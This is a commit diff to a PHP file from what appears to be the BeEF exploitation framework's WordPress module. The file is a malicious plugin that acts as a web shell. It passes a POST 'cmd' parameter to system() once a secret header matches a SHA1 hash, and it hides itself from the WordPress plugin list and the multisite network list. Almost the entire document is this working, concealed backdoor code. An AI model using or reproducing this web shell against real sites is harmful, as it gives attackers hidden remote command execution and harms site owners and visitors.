WordPress - Adds auth_key to Plugin, Use SecureRandom and Fixes fatal error when plugin file called directly

modules/misc/wordpress/upload_rce_plugin/beefbind.php

@@ -11,25 +11,33 @@
 
 header("Access-Control-Allow-Origin: *");
 
-if (isset($_POST['cmd'])) { echo @system($_POST['cmd']); }
-
+define('SHA1_HASH', '#SHA1HASH#');
 define('BEEF_PLUGIN', 'beefbind/beefbind.php');
 
-function hide_plugin() {
-    global $wp_list_table;
-    
-    foreach ($wp_list_table->items as $key => $val) {
-        if ($key == BEEF_PLUGIN) { unset($wp_list_table->items[$key]); }
-    }
+if (isset($_SERVER['HTTP_BEEF']) && strlen($_SERVER['HTTP_BEEF']) > 1) {
+	if (strcasecmp(sha1($_SERVER['HTTP_BEEF']), SHA1_HASH) === 0) {
+		if (isset($_POST['cmd']) && strlen($_POST['cmd']) > 0) {
+			echo system($_POST['cmd']);
+		}
+	}
 }
-add_action('pre_current_active_plugins', 'hide_plugin');
 
-// For Multisites
-function hide_plugin_from_network($plugins) {
-    if (in_array(BEEF_PLUGIN, array_keys($plugins))) { unset($plugins[BEEF_PLUGIN]); }
+if (defined('WPINC')) {
+	function hide_plugin() {
+	    global $wp_list_table;
+	    
+	    foreach ($wp_list_table->items as $key => $val) {
+	        if ($key == BEEF_PLUGIN) { unset($wp_list_table->items[$key]); }
+	    }
+	}
+	add_action('pre_current_active_plugins', 'hide_plugin');
 
-    return $plugins;
+	// For Multisites
+	function hide_plugin_from_network($plugins) {
+	    if (in_array(BEEF_PLUGIN, array_keys($plugins))) { unset($plugins[BEEF_PLUGIN]); }
+
+	    return $plugins;
+	}
+	add_filter('all_plugins', 'hide_plugin_from_network');
 }
-add_filter('all_plugins', 'hide_plugin_from_network');
-
 ?>